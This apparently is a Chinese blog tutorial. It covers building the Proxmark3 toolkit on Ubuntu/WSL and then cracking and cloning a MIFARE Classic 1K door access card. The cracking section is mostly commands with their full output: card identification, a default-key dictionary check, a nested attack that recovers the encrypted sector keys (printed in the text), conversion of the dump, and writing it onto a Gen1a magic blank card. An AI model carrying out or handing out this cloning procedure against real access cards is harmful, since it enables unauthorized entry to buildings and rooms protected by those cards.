PM3环境搭建
windows的环境搭建比较麻烦,有虚拟机的话可以用虚拟机,强烈安利WSL(Windows subsystem for Linux),非常友好。
接下来介绍基于Ubuntu的环境搭建,参考PM3Wiki
首先检查更新
sudo apt-get update && sudo apt-get upgrade
然后安装所依赖的工具
sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd
拉源码
git clone https://github.com/proxmark/proxmark3.git
当然可以使用第三方的固件,如Iceman
git clone https://github.com/RfidResearchGroup/proxmark3.git
然后获取最新的内容,进行权限配置
cd proxmark3
git pull
sudo cp -rf driver/77-mm-usb-device-blacklist.rules /etc/udev/rules.d/77-mm-usb-device-blacklist.rules
sudo udevadm control --reload-rules
sudo adduser $USER dialout
编译源文件
make clean && make all
然后就可以插入PM3了,由于我用的是WSL,Ubuntu与主机共用串口,所以需要先确定端口号,为COM7,就可以直接连接了,
sudo ./proxmark3 /dev/ttyS7
M1卡破解
首先进行卡片类型识别,先查看没有卡的时候天线信号
proxmark3> hw tune
Measuring antenna characteristics, please wait.........
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
将卡放在高频区,再进行天线信号检测
Measuring antenna characteristics, please wait.........
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
发现HF电压发生明显变化,则该卡为高频卡,同样也可用该方法识别低频卡,使用进一步的命令,识别该卡为M1卡
proxmark3> hf search
UID : 60 64 7d 26
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
查看扇区是否采用默认密码,
proxmark3> hf mf chk *1 ? t
--chk keys. sectors:16, block no: 0, key type:?, eml:y, dmp=n checktimeout=471 us
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9
To cancel this operation press the button on the proxmark...
--o
|---|----------------|----------------|
|sec|key A |key B |
|---|----------------|----------------|
|000| ffffffffffff | ffffffffffff |
|001| ? | ? |
|002| ffffffffffff | ffffffffffff |
|003| ? | ? |
|004| ffffffffffff | ffffffffffff |
|005| ffffffffffff | ffffffffffff |
|006| ffffffffffff | ffffffffffff |
|007| ffffffffffff | ffffffffffff |
|008| ffffffffffff | ffffffffffff |
|009| ffffffffffff | ffffffffffff |
|010| ffffffffffff | ffffffffffff |
|011| ffffffffffff | ffffffffffff |
|012| ffffffffffff | ffffffffffff |
|013| ffffffffffff | ffffffffffff |
|014| ffffffffffff | ffffffffffff |
|015| ffffffffffff | ffffffffffff |
|---|----------------|----------------|
28 keys(s) found have been transferred to the emulator memory
具体的命令使用说明,可以自行help
发现部分扇区采用默认密码。ffffffffffff
M1卡存在漏洞,可以通过已知扇区的key破解加密扇区的key
proxmark3> hf mf nested 1 0 A FFFFFFFFFFFF d
--nested. sectors:16, block no: 0, key type:A, eml:n, dmp=y checktimeout=471 us
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=1
Setting authentication timeout to 103us
Found valid key:01206f340100
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
Found valid key:112233445566
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
Found valid key:50f6a442e26d
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
Found valid key:e59925b18b43
-----------------------------------------------
Nested statistic:
Iterations count: 17
Time in nested: 8.851 (0.521 sec per key)
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| 112233445566 | 1 | 01206f340100 | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| 50f6a442e26d | 1 | e59925b18b43 | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| ffffffffffff | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...
已成功破解其他加密扇区的key,并且写到了dumpkeys.bin文件中,需要将该文件转化成PM3认识的格式才可进行门卡的复制
proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml
-----Finished
proxmark3>
然后将白卡放在高频区,把数据写到白卡里
proxmark3> hf mf cload 60647D26
Chinese magic backdoor commands (GEN 1a) detected
Loading magic mifare 1K
Loaded from file: 60647D26.eml
大功告成!!!
参考链接:
https://github.com/Proxmark/proxmark3/wiki/Ubuntu-Linux
https://www.cnblogs.com/k1two2/p/5706516.html
https://lzy-wi.github.io/2018/07/26/proxmark3/